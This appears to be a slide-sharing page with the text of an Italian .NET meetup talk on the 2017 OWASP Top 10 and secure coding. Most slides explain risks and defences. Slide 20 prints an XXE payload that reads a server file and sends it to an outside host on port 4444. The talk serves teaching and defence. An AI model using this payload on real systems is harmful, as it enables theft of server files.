 
Meetup ASP.NET Core Angular
Meetup ASP.NET Core AngularMeetup ASP.NET Core Angular
Meetup ASP.NET Core Angular
dotnetcode
 
Webhooks Meetup
Webhooks MeetupWebhooks Meetup
Webhooks Meetup
dotnetcode
 
Meetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency InjectionMeetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency Injection
dotnetcode
 
Presentazione DotNetSchool
Presentazione DotNetSchoolPresentazione DotNetSchool
Presentazione DotNetSchool
dotnetcode
 
Ad

Recently uploaded (20)

Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 

Meetup DotNetCode Owasp

  • 1. DotNetCode.IT Microsoft .Net Coding Community www.dotnetcode.it MeetUp! #AperiTech
  • 2. DotNetCode.IT Microsoft .Net Coding Community OWASP: Security for .NET Developers (scrivere codice sicuro o almeno provarci) Benvenuti DotNetCode.IT Microsoft .Net Coding Community
  • 3. DotNetCode.IT Microsoft .Net Coding Community #AperiTech
  • 4. DotNetCode.IT Microsoft .Net Coding Community 21 Aprile 2018 - Global Azure Bootcamp bit.ly/gabrome18
  • 5. DotNetCode.IT Microsoft .Net Coding Community Speaker Software Architect Comdata Digital Fabio Mannis Email : [email protected] Linkedin : https://www.linkedin.com/in/fabiomannis/
  • 6. DotNetCode.IT Microsoft .Net Coding Community AGENDA • Cosa è OWASP • Quali sono i top 10 punti da tenere presente per sviluppare applicazioni web «sicure» • Casi d'uso ed alcuni esempi su come scrivere codice sicuro (o almeno provarci!)
  • 8. DotNetCode.IT Microsoft .Net Coding Community • The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here. • There are hundreds of issues that could affect the overall security of a web application • The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
  • 9. DotNetCode.IT Microsoft .Net Coding Community OWASP Cheat Sheet Series
  • 10. DotNetCode.IT Microsoft .Net Coding Community Application Security Verification Standard (ASVS)
  • 11. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
  • 12. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection In an injection attack, instead of specifying data, the user is able to specify a command. This means that for applications which are vulnerable to injection attacks, hackers can in fact direct the system to perform an action which could lead to data exposure, loss of data integrity, and even data deletion.
  • 13. DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection • Sql Injection • Ldap Injection • Command Injection
  • 14. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
  • 15. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Password • Minumum lenght >=10 (or passphrases) • Maximun lenght 128 • Password complexity • Hashing • Secure Password Recovery Mechanism • No cookieless session • TLS!!!
  • 16. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Require re-authentication for Sensitive features (for mitigate CSRF or XSS attacks) • Authentication and Error Messages (generic manner) • Prevent Brute-Force Attacks • Built-in Session Management Implementations (Asp.net core identity) • Cookies • HttpOnly = true;
  • 17. DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Cookies • HttpOnly = true; • Default expiration (default : only current browser session valid) • Secure = true; • Domain
  • 18. DotNetCode.IT Microsoft .Net Coding Community A3:2017- Sensitive Data Exposure Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser
  • 19. DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
  • 20. DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml"> <!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">
  • 21. DotNetCode.IT Microsoft .Net Coding Community A5:2017-Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
  • 22. DotNetCode.IT Microsoft .Net Coding Community A6:2017-Security Misconfiguration Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.
  • 23. DotNetCode.IT Microsoft .Net Coding Community A7:2017- Cross-Site Scripting (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
  • 24. DotNetCode.IT Microsoft .Net Coding Community A8:2017- Insecure Deserialization Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
  • 25. DotNetCode.IT Microsoft .Net Coding Community A9:2017-Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
  • 26. DotNetCode.IT Microsoft .Net Coding Community A10:2017- Insufficient Logging & Monitoring Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
  • 28. DotNetCode.IT Microsoft .Net Coding Community DotNetCode.IT Microsoft .Net Coding Community
  • 29. DotNetCode.IT Microsoft .Net Coding Community Prossimo Evento Leonardo D’Ottavi Data: 18/05/2018
  • 30. DotNetCode.IT Microsoft .Net Coding Community Global Azure Bootcamp 2018 bit.ly/gabrome18
  • 31. DotNetCode.IT Microsoft .Net Coding Community Selfie Lottery www.dotnetcode.it http://bit.ly/sldnc20180418
  • 32. DotNetCode.IT Microsoft .Net Coding Community Grazie a Tutti! DotNetCode.IT Microsoft .Net Coding Community
  • 33. DotNetCode.IT Microsoft .Net Coding Community Follow US! www.dotnetcode.it https://www.facebook.com/DotNetCode.IT https://twitter.com/DotNetCodeIT https://plus.google.com/+DotnetcodeIt